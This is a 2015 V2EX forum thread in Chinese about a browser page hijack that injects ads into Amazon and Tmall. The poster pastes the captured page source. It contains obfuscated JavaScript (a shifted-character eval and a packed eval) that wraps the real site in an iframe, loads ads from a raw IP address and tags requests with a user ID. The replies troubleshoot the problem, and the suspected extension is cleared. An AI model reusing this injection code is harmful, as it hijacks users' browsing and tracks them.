浏览器里网站被 iframe 劫持,并嵌入广告,求解决方案!

2015-08-02 13:08:18 +08:00
 plqws

最近连续发生两次被浏览器(插件?)劫持并嵌入广告的事情,因为我最近往返厦门与上海,中途更换过操作系统,所以应该没有运营商劫持、系统应用劫持的可能性。

规律:
每次出现被劫持都是在安装 v2ex plus chrome扩展后 https://www.v2ex.com/t/198074
在厦门,那天是中午安装的,第二天出现广告。删除后不再出现。
在上海,昨天早上安装的,晚上就出现广告。
我怀疑过这个扩展,但是在源代码里找不到和iframe有关的字样……
(防作者毁灭证据我已经备份了一份)

昨晚出现过一次,是在天猫,今天又出现了一次,在亚马逊。
浏览器:QQ浏览器 9.01 Beta 2617 (Chrome 44)

我刚刚把亚马逊被劫持的网页源码保存下来了:
html
<html xmlns="http://www.w3.org/1999/xhtml" class="hb-loaded"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style>
@charset "utf-8";body, div, span, p, iframe,a{margin:0;padding:0;outline:none}.ad-dialog{position:absolute;z-index:998;padding:0px;font-size:12px;overflow:hidden;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;box-shadow:1px 2px 2px #999;-webkit-box-shadow:1px 2px 2px #999;-moz-box-shadow:1px 2px 2px #999}.ad-dialog .title{width:100%;height:25px;line-height:25px;text-align:left;text-indent:8px;font-size:12px;font-weight:bold;color:#FFF;background:#CCC;-webkit-border-top-left-radius:4px;-moz-border-top-left-radius:4px;border-top-left-radius:4px;-webkit-border-top-right-radius:4px;-moz-border-top-right-radius:4px;border-top-right-radius:4px}.ad-dialog .icon{position:absolute;top:0;right:0;margin-right:4px}.ad-dialog .icon a{width:20px;height:20px;margin:2px 0 0 2px;text-align:center;line-height:20px;float:left;display:inline-block;text-decoration:none;color:#FFF;font-family:Verdana, Geneva, sans-serif;font-weight:bold;font-size:15px;overflow:hidden}.ad-dialog .icon a:hover{color:#F00}.ad-dialog .icon a:hover span{border-color:#F00}.ad-dialog .icon a span{display:inline-block;margin:0px;padding:0;overflow:hidden;zoom:1}.ad-dialog .icon .icon-min span{height:8px;width:12px;margin:2px 3px;border-bottom:2px solid #FFF}.ad-dialog .icon .icon-max span{height:8px;width:8px;margin:4px 4px;border:2px solid #FFF}.ad-dialog .icon .icon-max span:hover{border:2px solid #F00}.ad-dialog .icon .icon-min span:hover{border-bottom:2px solid #F00}.ad-dialog .content{-webkit-border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;border-bottom-left-radius:4px;-webkit-border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;border-bottom-right-radius:4px}.style0{-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;box-shadow:none}.style0 .title{background:#CCC;color:#333}.style0 .content{-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px}.style0 .icon a{color:#333}.style0 .icon .icon-min span{border-color:#333}.style0 .icon .icon-max span{border-color:#333}.style1{border:1px solid #000}.style1 .title{background:#444}.style2{border:1px solid #0B4453}.style2 .title{background:#137893}.style3{border:1px solid #E91852}.style3 .title{background:#F27B9B}.style4{border:1px solid #BEA323}.style4 .title{background:#E6D479}.style5{border:1px solid #27AD85}.style5 .title{background:#58D9B3}.style6{border:1px solid #3E3564}.style6 .title{background:#5F529A}.style7{border:1px solid #DD6921}.style7 .title{background:#F9AA75}.style8{border:1px solid #285340}.style8 .title{background:#3F7F63}
</style><script>url = {a:"http://58.215.179.159/svr/sflow/fcbf0818",m:"http://www.amazon.cn/",s:"undefined"};var _iaui=true;var _xus="Y1MGY1mlYZzOdBFpzkogYPsLM1ogYm==M3gO";var _xai="264788";</script><script>eval((function(s){var str='';for(var i=0,len=s.length;i<len;i++){str+=String.fromCharCode(s.charCodeAt(i)-3);} return str})("ydu#dgsdudp#@#~*lg*=*378*/*lvwlwoh*=idovh/*wlwoh*=**/*srvlwlrq*=*uljkw#grzq*/*ghod|*=~*w|sh*=**/*wlph*=3€/*ordgiluvw*=*grf*/*rshqw|sh*=**/*dgvl}h*=~*z*=*733*/*k*=633€/*vnlqfroru*=*vw|oh3*/*plql*=~*deoh*=idovh/*vl}h*=~*z*=3/*k*=3€/*srvlwlrq*=**€€>"));function goURLa(){var desturl=url.a;if(desturl.slice(desturl.length-1)=="/")desturl=desturl.slice(0,desturl.length-1);return"<html></head><script>document.location.replace(\""+desturl+"\");<\/script><\/html>"};function goURLm(){var desturl=url.m;if(desturl.slice(desturl.length-1)=="/")desturl=desturl.slice(0,desturl.length-1);return"<html></head><script>document.location.replace(\""+desturl+"\");<\/script><\/html>"};Object.extend=function(t_,s_){for(var i in s_){if(typeof s_[i]!=="object"){t_[i]=s_[i]}else{t_[i]=t_[i]||{};Object.extend(t_[i],s_[i])}}return t_};function $(o){var d=document;function c(str){var s=d.getElementsByTagName('*'),c=[];for(var x = 0; x < s.length; x++){var a=s[x].className;if(a){s[x].className.indexOf(str)+1?c.push(s[x]):''}};return c.length==1?c[0]:c};return o.indexOf("#")+1?d.getElementById(o.split("#")[1].match(/\S+/)):o.indexOf(".")+1?c(o.split(".")[1].match(/\S+/)[0]):''};function out(s){document.writeln(s)};function css(obj,str){if(!obj||!obj.style){ return;}var t=obj.style.cssText,a=t.replace(/;\s+/ig,";").split(';'),c=[],b=str.replace(/;\s+/ig,";");if(t){for(var i in a){if(a[i]){var reg=RegExp(a[i].split(':')[0]);if(!b.match(eval("/"+a[i].split(':')[0]+"/ig"))){c.push(a[i])}}};b=(c.join(';')+';')+b};obj.style.cssText=b.replace(/%px/ig,'%')};function addClass(obj,name){var fixattr={'class':'className'},cs=obj.getAttribute("class"),cls=cs?'class':fixattr['class'];cs=obj.getAttribute(cls);obj.setAttribute(cls,cs?cs+' '+name:name)};extCallback=typeof(extCallback)=='undefined'?function(para){}:extCallback;
</script><title>亚马逊-网上购物商城:要网购, 就来Z.cn!</title></head><body style="margin:0px;overflow-x:hidden;overflow-y:hidden;" huaban_collector_injected="true"><iframe id="ifrmain" src="JavaScript:parent.goURLm()" scrolling="auto" width="100%" height="100%" frameborder="no" onload="" style="position: fixed; display: block;"></iframe><script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5=7(1){6(1.2.a.8(\'?\')>0){1.2.a=1.2.a+"&4="+1.3}9{1.2.a=1.2.a+"?4="+1.3}b(c)}',13,13,'|ad|url|userid|_us|extCallback|if|function|indexOf|else||setAdVisiable|true'.split('|'),0,{}))
</script><script>var ADwidth=0;var ADheight=0;var tmp_width=0;var tmp_height=0;var message={init:function(arg){var $t=this;var args={loadfirst:"ad",title:"-",istitle:false,mainsize:{w:'100%',h:'100%'},adsize:{w:300,h:180},position:"right down",delay:{type:'',time:3},opentype:"",mini:{able:true,size:{w:250,h:30},position:"left up"},skincolor:'style0'};$t.a=Object.extend(args,arg);$t.min_=0;var $t=this;loading(function(){$t.event();$t.animate();var param={url:url,userid:_xus,adid:_xai};extCallback(param)});function loading(callback){$t.win();$t.max();$t.winchange();css($('#ifrmain'),"display:none;");css($('#ad_id'),"display:none;");if($t.a.loadfirst=="ad"){setTimeout(function(){css($('#ifrmain'),"display:block;")},1000);css($('#ad_id'),"display:block;");callback()}else if($t.a.loadfirst=="doc"){css($('#ifrmain'),"display:block;");$('#ifrmain').onload=function(){css($('#ad_id'),"display:block;");callback()}}}},win:function(){var $t=this;$('.tt_').innerHTML=$t.a.title;css($('.tt_'),"width:"+$t.a.adsize.w+"px;");addClass($('.ad_'),$t.a.skincolor);$t.a.istitle?css($('.tt_'),"display:block"):css($('.tt_'),"display:none")},min:function(){var $t=this;setTimeout(function(){$t.min_=1},500);css($('.min_'),"display:none");css($('.max_'),"display:block");var adIframe=document.getElementById("adframe");if(adIframe){adIframe.src=url.s}$t.position($t.a.mini.position,$t.a.mini.size)},position:function(dir,size){var $t=this,s=size,l,r,t,b,l1,r1,t1,b1;switch(dir){case"left down":l=2;t='';r='';b=2;break;case"left up":l=2;t=2;r='';b='';break;case"right down":l='';t='';r=2;b=2;break;case"right up":l='';t=2;r=2;b='';break;case"center":r='';b='';l=($t.screen().w-s.w)*0.5;t=($t.screen().h-s.h)*0.5;break;default:t=dir.split(" ")[0];l=dir.split(" ")[1];r='';b='';break};css($('.ad_'),"left:"+l+"px;top:"+t+"px;right:"+r+"px;bottom:"+b+"px;");ADwidth=s.w;ADheight=s.h;css($('#adframe'),"width:"+s.w+"px;height:"+s.h+"px;");css($('.tt_'),"width:"+s.w+"px;")},screen:function(){var $t=this,d=document,b=d.body,e=d.documentElement;return{w:e.clientWidth,h:Math.max(b.scrollTop,e.scrollTop)+/BackCompat/i.test(d.compatMode)?b.clientHeight:e.clientHeight}},close:function(){var a=$('.ad_');a.parentNode.removeChild(a)},max:function(){var $t=this;css($('.max_'),"display:none");css($('.min_'),"display:block");$t.min_=0;$t.position($t.a.position,$t.a.adsize);var adIframe=document.getElementById("adframe");if(adIframe){adIframe.src=url.a}$t.a.mini.able?'':css($('.min_'),'display:none;')},winchange:function(){var $t=this;setInterval(function(){if(self!=parent){try{var a=parent.document.getElementById("ad_id");a.parentNode.removeChild(a)}catch(e){}parent.document.getElementById("ifrmain").style.overflow="hidden"}},50)},animate:function(){var $t=this,i=0;if($t.a.delay.type=='min')setTimeout(function(){$t.min()},$t.a.delay.time*1000);if($t.a.delay.type=='close')setTimeout(function(){$t.close()},$t.a.delay.time*1000);if($t.a.opentype=='move'){$('.ad_').onmouseover=function(){if($t.min_==1){$t.max()}}}},event:function(){var $t=this;$('.close_').onclick=function(){$t.close()};$('.min_').onclick=function(){$t.min()};$('.max_').onclick=function(){$t.max()}}};message.init(adparam);var t;function v(){if(document.title!=''){clearTimeout(t);return};var doc;if(document.all){doc=document.frames["ifrmain"].document}else{doc=document.getElementById("ifrmain").contentDocument};document.title=doc?doc.title:"";t=setTimeout("v()",500)};v();function createADPage(){var html="<iframe scrolling='no' frameborder='no' src='"+url.a+"' allowtransparency='true' id='adframe' class='ct_adframe'></iframe>";$(".content").innerHTML=html;css($('#adframe'),"width:"+ADwidth+"px;height:"+ADheight+"px;")};function setAdVisiable(flag){if(flag){if($("#adframe")){}else{createADPage()}css($('#ad_id'),"display:block;")}else{css($('#ad_id'),"display:none;")}};
</script></body></html>

8237 次点击
所在节点    问与答
14 条回复
zangbob
2015-08-02 13:59:34 +08:00
挨个扩展取消、启用来试。

我用的是一个Firefox上面的V2EX扩展,也有网页劫持。自打装了以后,上amazon没有正常过,真不知该怎样佩服他的水平。

懒得发贴了,在你这里回一个,顺手删掉了扩展。
honeycomb
2015-08-02 14:38:30 +08:00
排除法,可以尝试使用google提供的一个chrome应用审查chrome扩展的行为,具体名字记不起来
TakanashiAzusa
2015-08-02 14:50:46 +08:00
隐身模式开了看看。。话说tmall应该https了吧?要是还被插iframe,那肯定不是运营商的锅。。
你把那个插件发上来看看
plqws
2015-08-02 14:56:37 +08:00
@TakanashiAzusa 插件的发布帖 https://www.v2ex.com/t/198074
我把浏览器在用户目录下的所有相关文件都删除了,现在就没有这个问题出现了,看来的确是那个插件的锅!
TakanashiAzusa
2015-08-02 15:24:08 +08:00
@plqws 不过看了下这个插件,源码里确实没看出啥问题。。不知道啥情况了。。
sciooga
2015-08-02 16:30:39 +08:00
肯定是不关我的事… 代码就是GitHub上的代码,因为我是学生没有信用卡无法注册成为Google的开发者,所以chrome所有版本都是另一位朋友代为发布,在我所了解的情况他没有嵌入什么其他的代码,如果有需要我也可以帮你排查一下,稍后我也检查一下当前发布的最新版代码有没有异常。
sciooga
2015-08-02 16:44:55 +08:00
@zangbob v2ex plus 的 firefox 版基本接近正常工作了,我保证是没有任何劫持相关的代码

@plqws
@TakanashiAzusa
你这些怀疑我觉得应该是多余的啊,要操作一些网站我记得是得申请这个网站的权限,你在安装 v2ex plus 时应该是有提示权限的
除了 v2ex 之外的两个网站都是用于上传图片申请的权限。
plqws
2015-08-02 17:03:19 +08:00
@sciooga 不好意思,经过我整个下午的排查,的确应该不是 v2ex plus 的问题,因为我发现在 IE 下有同样的劫持现象。这里对我没有证据而鲁莽定下的结论表示歉意!
sciooga
2015-08-02 17:09:10 +08:00
@plqws 没关系,相信 V 站里面还是没有那么多恶意的,这只是个误会。
zangbob
2015-08-02 18:00:18 +08:00
sciooga
2015-08-02 18:07:59 +08:00
@zangbob 我刚刚表达有些问题,刚想说的是 v2ex plus 正在移植到 firefox,现在已经能正常工作了,不过目前还处于内测中。
TakanashiAzusa
2015-08-02 18:08:36 +08:00
@sciooga 我前面也只是单纯根据楼主一点点信息来推测插件有问题而已。。而且确实在源代码里也没有发现什么问题。。倒也没说一定就是你的锅- -
sciooga
2015-08-02 18:15:00 +08:00
@TakanashiAzusa 我又不是什么小气的人 = =,弄清楚是误会就好了嘛...
Ouyangan
2015-08-03 00:10:59 +08:00
嗯嗯嗯嗯 , 我喜欢大家这样子

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/210212

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX